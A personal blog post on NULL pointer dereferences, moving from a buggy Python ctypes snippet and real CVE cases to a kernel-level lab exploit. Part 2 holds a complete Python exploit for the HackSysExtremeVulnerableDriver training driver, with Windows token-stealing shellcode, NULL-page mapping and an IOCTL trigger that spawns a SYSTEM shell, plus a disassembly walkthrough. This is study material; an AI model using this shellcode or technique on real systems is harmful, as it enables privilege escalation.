Null dereferences: user and kernel(land) review

This is nothing new, just a mind-clearing and idea-organizing exercise for me. But you're welcome to read it and steal some of the sources I'll be mentioning.

~ Synopsis ~

In this post I'll start with a vulnerability I found in code posted on a Python mailing list. The vulnerability is known as a NULL pointer dereference and, as you may know if you've been in this field for a while, it's extremely common.

I'll then go over how this vulnerability could be exploited in different ways, depending on what the developer(s) do with the code I found it in.

To finish the post, I'll introduce some more concepts and look at what would happen if, instead of living in a simple program, the bug lived inside a kernel module. I'll wrap things up by writing an exploit for HackSysExtremeVulnerableDriver.

Part 1: User mode

~ Introduction ~

+ The buggy code 

It all started one foggy, rainy morning..

No but seriously.
I was working on a Python script that used the ctypes module and found that I needed a file descriptor for a directory. Sadly, Python doesn't have C's implementation of dirfd, so I had to do my research.
After googling for a while, I ended up on a mailing list where a user with the same problem had thrown the question out to the public 10 years ago. Another user replied with the code below, which pretty much marked the end of the thread.
How damaging could this be? It depends on how many people used it and how they used it. And considering it was the first result I got when searching for a directory fd in Python, I'm going with quite a few people.

When I copied the code and tried to implement it in my own script, everything went well and it did what it had to do. But then I decided to start fuzzing it a bit, just to see how it responded. It really didn't take much for it to give me a segfault.
'What, a segfault, why?'
I don't know why, let's look at what "I" had:

from ctypes import *
import sys


class c_dir(Structure):
    """Opaque type for directory entries, corresponds to struct DIR"""

def get_directory_file_descriptor(directory):
    c_dir_p = POINTER(c_dir)
    c_lib = CDLL("libc.so.6")
    opendir = c_lib.opendir
    opendir.argtypes = [c_char_p]
    opendir.restype = c_dir_p
    dirfd = c_lib.dirfd  # <-- 1
    dirfd.argtypes = [c_void_p]
    dirfd.restype = c_voidp
    closedir = c_lib.closedir
    closedir.argtypes = [c_dir_p]
    closedir.restype = c_int

    dir_p = opendir("%s" % directory)  # <-- 2
    print ("dir_p = %s:%r" % (directory, dir_p))
    dir_fd = dirfd(dir_p)
    print("dir_fd = %r" % dir_fd)
    print ("closed (rc %r)" % closedir(dir_p))

get_directory_file_descriptor(sys.argv[1])


See it yet?
At first I was convinced the fault was only in dirfd, but I couldn't see what exactly was going on inside it or why the stack trace came back as

(gdb) bt
#0  dirfd (dirp=0x0) at ../sysdeps/posix/dirfd.c:27

[...]
 

So it HAD to be in dirfd, right?
No.

+ The python white knight

I talked with one of the python maintainers and he told me a few interesting key points:

> "Your segfault isn't occurring when you load dirfd, it occurs when you call it on the result of opendir, when opendir returned NULL on failure (due to the non-existent directory you call it with). You didn't check the return value, and end up doing flagrantly illegal things with it."
> "Ctypes lets you do evil things that break the rules, and if you break the rules the wrong way, segfaults are to be expected. Check your return values (for Py2)"
> "Side-note: When replying to e-mails, don't include the quotes from the e-mail you're replying to; it just clutters the tracker."

Ok. Sorry.
And thanks.

+ Understanding and identifying the vuln 

The important bit is that now we know the bug: opendir goes looking for something that doesn't exist when we call it with unexpected parameters, for example NULL or a string of nonsensical characters like "pigeonloaf", and nobody checks what it returns.

$ python segmentation-fault.py 
$ python segmentation-fault.py pigeonloaf

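The second one ends in a segmentation fault because opendir expects the name of an existing directory: when it doesn't get one, it fails and returns NULL, and dirfd then dereferences that NULL (dirp=0x0). With the script exactly as listed above, the first one stops even earlier, with an IndexError on sys.argv[1], so it never gets as far as opendir.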

'Okay okay but why would it segfault when NULL, *why* did they make things like that?'
I will also include that a little bit further down this post.

The thing is that this is what we call a NULL dereference or unchecked return value vulnerability, and it's a very common problem in code that doesn't check what its calls return. OWASP actually has another entry for it, "Missing check against Null". It's especially scary when it's found in kernel modules, because there it can end in privilege escalation, as we'll see.

~ Taking advantage of it ~

+ Going over some cases 

So the first thing I want to share is a few real cases where a snippet of code introduced this type of vulnerability, even though we're not at the kernel case yet (we'll explore that in a bit).

We'll go over two of them here, and I'll list a few more afterwards in case you want to check them yourself. Alternatively, you can google "null dereference cve" or similar and explore the different links.

- The DNSmasq case

In this example, a user reported a vulnerability he/she found in the source code of dnsmasq. In the report you can read how this person found that the result of a function called skip_question() is not checked for an error (and, as we said before, an error here means returning NULL). Because m = skip_question() - header pointer, if skip_question() failed and returned NULL, m would end up being a negative value.

Further investigation led this person to find out that if m < 0xffffffff80000000, the heap can be read by an attacker.
I really liked this case because it shows that this vulnerability will not always end in just a DoS. The impact of the vuln depends on the conditions of the program and its environment.

- The FFmpeg case

In this other one, the reporter crafted a mov file (how he did it, he doesn't say, but if you find out let me know) which set pc->buffer to NULL.
We know what happens if you don't check for error/NULL values, we've been there. And so, the same segfault happened (NVD link).
Other cases worth a look: the XPath case and the Exempi case.

+ Fixing it

So if you have checked the NVD link for the FFmpeg case, you can see that there is a link to their GitHub account where they patched this buggy snippet (commit).
As you can see, they fixed it by swapping the return on line 92 (the one in red) for a continue on the same line (in green). This way, if remaining results in an error, the code just keeps looping instead of returning the value of dctx->remaining with the error in it.

Then how could we fix the vulnerable code we found in that mailing list?
Well, in this specific case, we can check whether the supplied value is actually a directory by first importing os at the beginning:
import os

And then, right after entering our function, checking if it's actually a directory:
    if not os.path.isdir(directory):
        print("That's not a directory. Are you okay buddy?")
        sys.exit(-1)


And that's pretty much all for this specific case and with this specific input type.
Just a matter of keeping an eye on inputs while you add more functionality to your programs/scripts.
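
For completeness, here's a minimal sketch of the other way to fix it, the one the maintainer hinted at: check the return value of opendir before handing it to dirfd. This is a Python 3 take and not the code from the mailing list; the name checked_dirfd is made up for illustration, and it assumes a POSIX libc is reachable through ctypes.

```python
import ctypes
import ctypes.util
import os

# Assumption: a POSIX libc is available; "libc.so.6" is only a glibc fallback name.
libc = ctypes.CDLL(ctypes.util.find_library("c") or "libc.so.6", use_errno=True)

libc.opendir.argtypes = [ctypes.c_char_p]
libc.opendir.restype = ctypes.c_void_p    # a NULL return shows up as None
libc.dirfd.argtypes = [ctypes.c_void_p]
libc.dirfd.restype = ctypes.c_int
libc.closedir.argtypes = [ctypes.c_void_p]
libc.closedir.restype = ctypes.c_int


def checked_dirfd(directory):
    """Return the descriptor number dirfd() reports, or raise OSError."""
    dir_p = libc.opendir(os.fsencode(directory))
    if dir_p is None:
        # opendir failed: report the error instead of passing NULL to dirfd.
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err), directory)
    try:
        return libc.dirfd(dir_p)
    finally:
        # Like the original script, the stream is closed right away,
        # so the returned number is informational only.
        libc.closedir(dir_p)
```

Checking the return value also covers cases that os.path.isdir can't, like a directory that exists but that you don't have permission to open.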

Part 2: Jumping inside the kernel

Oh well here we go. This is the fun(?) bit :)

~ How the kernel handles null pointers and what mmap does ~

So before digging into it, a little bit of basics, just in case you don't know how the kernel handles NULL pointers or what mmap is and (very superficially) how it works.

NULL pointers

A NULL pointer is a special pointer value which doesn't point to any object or function, but has the same byte-size as a normal pointer and compares equal to any other pointer whose value is also null.

The operating system sets things up so that accessing memory through a null pointer, whether it's writing or reading values, results in a segmentation fault. The NULL pointer is a reserved constant value.

As C11 defines it:

"An integer constant expression with the value 0, or such an expression cast to type void *, is called a null pointer constant."

NULL is *typically* represented as all 0 bits, but it doesn't always need to be like that, it just usually is. It depends on the implementation you're working with.
However, because each application/program has its own address space and we can do whatever we want with it, we can also declare NULL as a valid address, a.k.a. mapping the NULL page (that is, declaring that this area of memory should map to some piece of physical memory, which also brings in the subject of virtual memory; I'll assume you've read about it or gone over the links referenced at the end, which I really recommend too).
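
Since this post started with ctypes, here's a small sketch of those NULL pointer properties seen from Python. The variable names are just for illustration. Note that the ValueError at the end is a safety net ctypes adds on its own side; a raw C function like dirfd gets no such check, which is why the first part of this post ended in a segfault.

```python
import ctypes

IntPtr = ctypes.POINTER(ctypes.c_int)

null_ptr = IntPtr()                  # a pointer instance created without a target is NULL
value = ctypes.c_int(42)
real_ptr = ctypes.pointer(value)     # a pointer to a real object, for comparison

# Same byte-size as any other pointer of that type.
same_size = ctypes.sizeof(null_ptr) == ctypes.sizeof(real_ptr)

# ctypes treats NULL pointers as false, and reports address 0 as None.
null_is_falsy = not bool(null_ptr)
raw_address = ctypes.cast(null_ptr, ctypes.c_void_p).value

try:
    null_ptr.contents                # ctypes refuses to dereference NULL
    deref_error = None
except ValueError as exc:
    deref_error = str(exc)
```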

mmap

What do we want to know mmap for? Well, because that's the function UNIX systems use for mapping regions of memory. And because mapping the null page is disallowed by default on those systems, it will be useful to know how to change that so it's allowed.
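
On Linux, the knob behind that "disallowed" is the vm.mmap_min_addr sysctl: unprivileged processes can't map anything below that address. A minimal sketch for checking it, assuming a Linux guest with /proc mounted (the helper name read_mmap_min_addr is made up for illustration; anywhere else it simply returns None):

```python
from pathlib import Path

# Linux exposes the sysctl vm.mmap_min_addr through this file.
MMAP_MIN_ADDR = Path("/proc/sys/vm/mmap_min_addr")


def read_mmap_min_addr(path=MMAP_MIN_ADDR):
    """Return the lowest address an unprivileged mmap may use, or None if unknown."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        # File missing (not Linux, no /proc) or unreadable content.
        return None


lowest = read_mmap_min_addr()
if lowest is None:
    print("mmap_min_addr not available on this system")
elif lowest == 0:
    print("the NULL page can be mapped")
else:
    print("mappings below 0x%x are refused" % lowest)
```

Inside the throwaway VM, root can lower the limit with sysctl -w vm.mmap_min_addr=0.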

I think now's a good time to say: don't do this on your own machine. Use a virtual machine, don't be silly.

~ Null dereferences inside kernel modules ~

So this vulnerability is found e-v-e-r-y-w-h-e-r-e and all the time, and to prove it I've included three recent cases (the oldest one is from 2016) where it was reported, this time in the kernel.
1. Apple MacOSX 
2. Redhat
3. Linux kernel

As you can see from the last one, the Linux kernel one, we're pretty much looking at the same thing as the non-kernel ones, it just happens to be in the kernel this time. For example, if we go to the github commit where they fixed that vulnerability:

if (rs->rs_bound_addr == 0 || !rs->rs_transport) {

They only needed to check for its existence. So it sticks with the definition of "a null pointer dereference is where we're dealing with empty or invalid values which are overlooked".
If rs->rs_bound_addr is zero or rs->rs_transport is NULL, the check now stops the flow of execution. Before the commit that case wasn't considered, so an unhandled NULL value was passed along and eventually dereferenced. And that is exactly what I found in the code on the first mailing list (kinda).

~ From hero to zero ~

For this example, I will be using HackSysExtremeVulnerableDriver, which is a pretty dank vulnerable driver written by hacksysteam that bundles a lot of different vulnerabilities to practice on and understand.

I found the blog post written by FuzzySecurity about how to set up the driver inside a Windows machine from a Windows host very useful. Also, please check out Hasherezade's post about it if you're really going to do it; she totally saved my ass on more than one occasion when I didn't have a clue what was wrong with my setup. Hers is a must.

As for the exploit, I mostly based mine on Rootkit's, mainly because it was in Python and I wanted to write my exploit in Python.

The first thing I'm going to do is go over NullPointerDereference.c, which hacksysteam uploaded to their repo.

The interesting bit starts at line 74, which as of today is the beginning of the function TriggerNullPointerDereference().
1. ProbeForRead: as the comment says, it tests if we're still in user mode. "(...) checks that a user-mode buffer actually resides in the user portion of the address space (...)".
2. ExAllocatePoolWithTag: it allocates pool memory and returns a pointer to the allocated block. The last argument, the Tag, is a string of up to four characters, usually specified in reverse order. Here the Tag is POOL_TAG.

If this second function is unsuccessful, if (!NullPointerDereference) will end it.
But if it is successful, we'll get a set of debug strings which will help us later to find out some relevant information.

Then, in the next if (line 115), it compares UserValue to MagicValue. If they are equal, execution proceeds as usual. If they are not (and that's the part that interests us), a sort of "stack trace" will be printed by the debugger.

+ The exploit

import sys
import ctypes
from ctypes import *
from subprocess import *

magicValue = "\x37\x13\xD0\xBA"
lenMagicValue = len(magicValue)

GENERIC_READ_WRITE = 0xC0000000
FILE_SHARE_READ_WRITE = 0x00000003
OPEN_EXISTING = 0x3
FILE_ATTRIBUTE_NORMAL = 0x80
PAGE_EXECUTE_READWRITE = 0x40
BASE_ADDRESS = 0x1
REGION_SIZE = 0x100
MEM_COMMIT_RESERVE = 0x3000

def theExploit():
   
    shellcode = bytearray(
        "\x90\x90\x90\x90"              # NOP Sled
        "\x60"                          # pushad
        "\x64\xA1\x24\x01\x00\x00"      # mov eax, fs:[KTHREAD_OFFSET]
        "\x8B\x40\x50"                  # mov eax, [eax + EPROCESS_OFFSET]
        "\x89\xC1"                      # mov ecx, eax (Current _EPROCESS structure)
        "\x8B\x98\xF8\x00\x00\x00"      # mov ebx, [eax + TOKEN_OFFSET]
        "\xBA\x04\x00\x00\x00"          # mov edx, 4 (SYSTEM PID)
        "\x8B\x80\xB8\x00\x00\x00"      # mov eax, [eax + FLINK_OFFSET]
        "\x2D\xB8\x00\x00\x00"          # sub eax, FLINK_OFFSET
        "\x39\x90\xB4\x00\x00\x00"      # cmp [eax + PID_OFFSET], edx
        "\x75\xED"                      # jnz
        "\x8B\x90\xF8\x00\x00\x00"      # mov edx, [eax + TOKEN_OFFSET]
        "\x89\x91\xF8\x00\x00\x00"      # mov [ecx + TOKEN_OFFSET], edx
        "\x61"                          # popad
        "\xC3"                          # ret
    )

    shellcodeLen = len(shellcode)
   
    try:
        kernel32 = windll.kernel32
        ntdll = windll.ntdll
       
        maliciousDriver = kernel32.CreateFileA(
            "\\\\.\\HacksysExtremeVulnerableDriver",
            GENERIC_READ_WRITE,
            FILE_SHARE_READ_WRITE,
            None,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            None)
       
        ptr = kernel32.VirtualAlloc(
            0,
            shellcodeLen,
            MEM_COMMIT_RESERVE,
            PAGE_EXECUTE_READWRITE)
       
        buff = (c_char * len(shellcode)).from_buffer(shellcode)
       
        kernel32.RtlMoveMemory(
            ptr,
            buff,
            shellcodeLen)
               
        nullPage = ntdll.NtAllocateVirtualMemory(
            0xFFFFFFFF, # https://stackoverflow.com/questions/5818173/why-does-getcurrentprocess-return-1
            byref(c_void_p(BASE_ADDRESS)),
            0,
            byref(c_ulong(REGION_SIZE)),
            MEM_COMMIT_RESERVE,
            PAGE_EXECUTE_READWRITE)
       
        if nullPage != 0x0:
            print("Couldn't allocate NULL page: %r" % nullPage)
            sys.exit(-1)

        if not kernel32.WriteProcessMemory(0xFFFFFFFF, 0x4, byref(c_void_p(ptr)), 0x40, byref(c_ulong())):
            sys.exit(-1)

        kernel32.DeviceIoControl(
            maliciousDriver,
            0x22202b,
            magicValue,
            lenMagicValue,
            None,
            0,
            byref(c_ulong()),
            None)

        Popen("start cmd", shell=True)

    except Exception as e:
        print("Error! %s" % e)
        sys.exit(-1)

if __name__ == "__main__":
    theExploit()
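
A quick aside on the 0x22202b passed to DeviceIoControl: it's an IOCTL code, and it can be taken apart with a few shifts. This is a minimal sketch assuming the standard Windows CTL_CODE bit layout (device type in bits 16-31, access in bits 14-15, function in bits 2-13, method in bits 0-1); the helper name decode_ioctl is made up for illustration.

```python
def decode_ioctl(code):
    """Split a Windows IOCTL code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


fields = decode_ioctl(0x22202B)
for name, field_value in fields.items():
    print("%-12s 0x%X" % (name, field_value))
```

A device type of 0x22 is FILE_DEVICE_UNKNOWN and a method of 3 is METHOD_NEITHER, which means the driver receives the raw user-mode buffer pointer. That fits with the ProbeForRead call seen earlier.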


+ Discovering the exploit

Like everyone else, I thought it might be a good idea to take a look at the vulnerable driver with IDA Pro 7, where I found interesting things.

When we load the driver, we're greeted with an ASCII title "HEVD", and afterwards the debug output keeps coming when we execute the vulnerable function, whether we trigger the null dereference or not.
Take a look at the strings under it. Do you remember how ExAllocatePoolWithTag has a tag of up to four characters that are in reverse order? Can you see what's written in '[+] Pool Tag' ? Also check out the string in '[+] UserValue'.


That offers some clues as to where to start searching: strings like those can help us find the vulnerable function that prints them, and with it some of the information we needed to build the exploit.


Ah so there are the strings. It would be a great idea to follow the bread crumbs and just look a bit further up, to see what led us there.


That was before the previous image. EAX is zero then? What if we look up a little bit more...


And up a bit more...


And that's it! Well not really, because EAX starts by being equal to 22201Fh. Let's just write it down:
  1. EAX = 22201Fh
  2. We move EDX to EAX. We don't know what's in EDX.
  3. We subtract 222023h from EAX. (For reference, 0x00222023 - 0x0022201F = 0x4.)
  4. If that subtraction gives zero, the vulnerability is not triggered. So let's pretend that it's not zero, that the result is something else.
  5. We're now at 0x000151AF, where we push 4 onto the stack.
  6. As you can see, there is a PUSH 4; POP ECX; which pushes 0x4 onto the stack and immediately pops it into ECX, replacing whatever ECX held before. So ECX now has the value 0x4 in it. Cool beans.
  7. Okay, now if we subtract 0x4 (ECX) from EAX and the result is not zero... we most def do not jump where we would if it was zero :D Okay but seriously, we need to keep the value non-zero if we want to trigger the "fault", so let's pretend.
  8. Once again, we subtract 0x4 (ECX) from EAX, and this time if it is zero, then we'll jump into the null pointer fault.
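
The steps above can be replayed in a few lines to find out what EDX has to hold. This is only a sketch of the subtraction chain as I read it from the listing; it assumes the two earlier "zero" jumps lead to other handlers, and the function name is made up for illustration.

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide


def reaches_null_deref_handler(edx):
    """Replay the subtraction chain from the steps above for a given EDX value."""
    eax = (edx - 0x222023) & MASK32   # step 3: sub eax, 222023h
    if eax == 0:
        return False                  # step 4: zero here goes somewhere else
    ecx = 4                           # steps 5-6: push 4 / pop ecx
    eax = (eax - ecx) & MASK32        # step 7: first sub eax, ecx
    if eax == 0:
        return False                  # zero here also goes somewhere else
    eax = (eax - ecx) & MASK32        # step 8: second sub eax, ecx
    return eax == 0                   # zero now means the null pointer path


# The value that survives the chain is 0x222023 + 0x4 + 0x4.
candidate = 0x222023 + 0x4 + 0x4
print(hex(candidate), reaches_null_deref_handler(candidate))
```

That candidate is 0x22202b, the same number the exploit passes as the second argument of DeviceIoControl.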
With all that small analysis done, if we look again at the exploit, we can see the string \x37\x13\xD0\xBA as the magicValue. So what's that? Look again at the debugging strings printed. There's something that goes by the name "UserValue", which we set to 0xBAD01337 in the exploit.


Just look at the last yellow highlighted rectangle. Huh? That's comparing BAD0B0B0 to EAX, and EAX holds the UserValue. And if they're not equal, then the Null Pointer dereference is triggered.
That's why magicValue is necessary.
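
If the byte order of that string looks backwards, that's just little-endian packing. A small sketch with the struct module (the constant names are for illustration only):

```python
import struct

USER_VALUE = 0xBAD01337     # what the exploit sends as UserValue
MAGIC_VALUE = 0xBAD0B0B0    # what the driver compares it against

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
packed_user_value = struct.pack("<I", USER_VALUE)
packed_magic_value = struct.pack("<I", MAGIC_VALUE)

# The two values differ, so the comparison in the driver fails.
values_differ = packed_user_value != packed_magic_value

print(packed_user_value.hex(), packed_magic_value.hex(), values_differ)
```

The first packed value is the same four bytes as the \x37\x13\xD0\xBA string in the exploit.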

Yeah okay but what's up with the 0x4 mess that was explained before?
In short:


It's calling whatever is at ESI+4, and that's the position where we want to put the pointer to our shellcode, because that's a position we now control.
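
To see where that +4 comes from, here's a sketch that models the object with ctypes. The layout is an assumption on my side (a 4-byte value followed by a 32-bit function pointer, which is what the ESI+4 call suggests), and the class and field names are hypothetical.

```python
import ctypes


class NullDerefObject(ctypes.Structure):
    # Hypothetical 32-bit layout: a value, then a callback pointer.
    _fields_ = [
        ("Value", ctypes.c_uint32),
        ("Callback", ctypes.c_uint32),   # 32-bit function pointer modelled as an integer
    ]


callback_offset = NullDerefObject.Callback.offset

# With the object pointer being NULL (ESI = 0), the callback is read from here.
object_base = 0x0
callback_slot = object_base + callback_offset

print("callback is read from address 0x%X" % callback_slot)
```

That slot is the 0x4 the exploit hands to WriteProcessMemory after mapping the NULL page.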

In long: take a look at the links and references.


~ Bibliography ~

Oracle - Introduction to virtual memory (part1)
Oracle - Exploiting a kernel NULL dereference (part2)
LWN - Fun with NULL pointers (part1)
LWN - Fun with NULL pointers (part2)

GeeksforGeeks - NULL pointer in C
CPPreference - Pointer declaration
Rootkits - Kernel Null Pointer Dereference
Ch3rn0byl - The wonderful Null Dereference
